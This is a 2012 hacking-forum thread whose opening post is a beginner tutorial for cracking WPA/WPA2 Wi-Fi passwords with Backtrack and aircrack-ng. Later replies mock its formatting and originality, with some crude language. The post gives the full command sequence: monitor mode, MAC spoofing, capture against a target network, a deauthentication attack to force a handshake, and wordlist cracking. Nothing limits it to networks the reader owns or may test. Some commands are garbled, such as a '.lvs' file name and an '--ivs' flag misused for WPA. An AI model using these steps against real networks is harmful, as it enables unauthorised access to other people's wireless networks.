Author Topic: How to hack wpa/wpa2[For Beginners]  (Read 10719 times)

0 Members and 1 Guest are viewing this topic.

Offline bayyak

  • /dev/null
  • *
  • Posts: 6
  • Cookies: 1
    • View Profile
How to hack wpa/wpa2[For Beginners]
« on: December 24, 2012, 01:21:23 am »
ok guys im gonna clear up this tutorial as much as i can,so all people can understand.
requirements:
1.wireless card capable of packet injection
2.Backtrack(5 or 5r3) burned to a usb or cd.
OK,so when backtrack boots up,follow these steps:
1.Enter terminal program
Type: airmon-ng (the list of wireless cards will popup)
             wlan0 or wlan1 (depending on the name of your wireless card)
             airmon-ng start wlan0(this will put the wireless card in monitor mode)
2.so now if you type airmon-ng you will see (wlan0 and mon0).
3.Now we have to change the MAC address.
Type: ifconfig mon0 down (turns it down)
             macchanger -m 00:11:22:33:44:55 mon0(changes the MAC number)
             ifconfig mon0 up(turns it on)
4.Now to scan available networks.
Type: airodump-ng mon0
let it scan for about 20>30sec,so after we scanned we got 1 available network
              BSSID                       PWR     Beacons  #Data  #/s   CH MB    EMC   CIPHER AUTH  ESSID
             02:2A:0A:BE:55:B9   -34     -48           2          0      1    54   WPA2  TKIP      PSK    jimmy

5.Now we have to collect data about the network.
Type: airodump-ng -c 1 -w wpacracker --bssid 02:2A:0A:BE:55:B9 --ivs mon0
-c is the channel number(CH)/-w is the name of the data file(call it whatever you want)/--bssid is BSSID/--ivs(the certain way to crack wpa)
6.Now if there were any clients using the router,stations must appear
if not then the process wont work and you have to wait until some people start using it..
6.Now open up another terminal.
Type: aireplay-ng -0 1 -e jimmy mon0
wait about 10 sec
so if you look to the other terminal you will see WPA-handshake 02:2A:0A:BE:55:B9
7.Now if we type:dir
you will see that the file was created wpacracker.ivs that contains all the data for the network
8.Now to crack the network after we have collected all data.
Type: aircrack-ng -w /root/Desktop/darkc0de.lst wpacracker.lvs
-w: is the path to the wordlist,you can use any wordlist you want,but BT has one inside it.
9.OK were done,now you just have to wait to see if it catches the password..maybe it is in the list,maybe not.

             

Offline Snayler

  • Baron
  • ****
  • Posts: 812
  • Cookies: 135
    • View Profile
Re: How to hack wpa/wpa2[For Beginners]
« Reply #1 on: December 24, 2012, 02:15:41 am »
Let me be honest with you:
Your formatting sucks, and you chose a tutorial that has been written before in this forums.
You also sound limited on words (every new point starts with "now this, now that").
You say "we have to change the MAC address" but you don't specify why, and it gives the wrong idea that the attack won't work without that step.
Lastly, you say in your title this is for beginners, but that's definitely not true. A beginner will not learn much from this, at best it will confuse him more. For example:
Quote
Now if there were any clients using the router,stations must appear
Must appear where? Right above my shoulder? A beginner might not even know what a station is. Do you get my point?

Offline iTpHo3NiX

  • EZ's Pirate Captain
  • Administrator
  • Titan
  • *
  • Posts: 2920
  • Cookies: 328
    • View Profile
    • EvilZone
Re: How to hack wpa/wpa2[For Beginners]
« Reply #2 on: December 24, 2012, 04:14:43 am »
Same tutorial as this:
http://evilzone.org/tutorials/wpa-cracking-with-backtrack-5/

Just that one has better formatting. Then there's also this:
http://evilzone.org/tutorials/cracking-wpawpa2-encryption-pre-shared-key-(psk)/

So this makes #3
[09:27] (+lenoch) iTpHo3NiX can even manipulate me to suck dick
[09:27] (+lenoch) oh no that's voluntary
[09:27] (+lenoch) sorry

Offline bayyak

  • /dev/null
  • *
  • Posts: 6
  • Cookies: 1
    • View Profile
Re: How to hack wpa/wpa2[For Beginners]
« Reply #3 on: December 24, 2012, 04:36:16 am »
Guys if you find it so crappy I'll tell a moderator to Delete it

Offline Snayler

  • Baron
  • ****
  • Posts: 812
  • Cookies: 135
    • View Profile
Re: How to hack wpa/wpa2[For Beginners]
« Reply #4 on: December 24, 2012, 04:49:25 am »
Guys if you find it so crappy I'll tell a moderator to Delete it
Why not make it better? You sure give up fast. I'm sorry I was so harsh, but life will always throw you lemons. Learn to make some fucking lemonade.

Offline iTpHo3NiX

  • EZ's Pirate Captain
  • Administrator
  • Titan
  • *
  • Posts: 2920
  • Cookies: 328
    • View Profile
    • EvilZone
Re: How to hack wpa/wpa2[For Beginners]
« Reply #5 on: December 24, 2012, 08:15:01 am »
I don't mind throwing it in the trash if you feel you need to be such a dick about it -_-
[09:27] (+lenoch) iTpHo3NiX can even manipulate me to suck dick
[09:27] (+lenoch) oh no that's voluntary
[09:27] (+lenoch) sorry

Offline Axon

  • VIP
  • King
  • *
  • Posts: 2047
  • Cookies: 319
    • View Profile
Re: How to hack wpa/wpa2[For Beginners]
« Reply #6 on: December 24, 2012, 10:41:49 pm »
No offense. But if you want to make a tutorial, at least make a bit organized so the "beginner" can understand it much better. Also if what you're doing is simply"Copy/Paste" which I think it's true, then at least give some credits son.
« Last Edit: December 24, 2012, 10:42:21 pm by Axon »

Offline bayyak

  • /dev/null
  • *
  • Posts: 6
  • Cookies: 1
    • View Profile
Re: How to hack wpa/wpa2[For Beginners]
« Reply #7 on: December 25, 2012, 12:13:57 am »
I never copy and paste anyone's work,i wrote it.and as the guys are nagging about its bad format just delete it

Offline techb

  • Soy Sauce Feeler
  • Global Moderator
  • King
  • *
  • Posts: 2350
  • Cookies: 345
  • Aliens do in fact wear hats.
    • View Profile
    • github
Re: How to hack wpa/wpa2[For Beginners]
« Reply #8 on: December 25, 2012, 04:25:53 am »
I never copy and paste anyone's work,i wrote it.and as the guys are nagging about its bad format just delete it

Or lock? It was an attempt, but maybe could use some organization. Maybe le next one could be a script/program to log the IVs or other data needed like hidden SSIDs? Let's see some code.

/
>>>import this
-----------------------------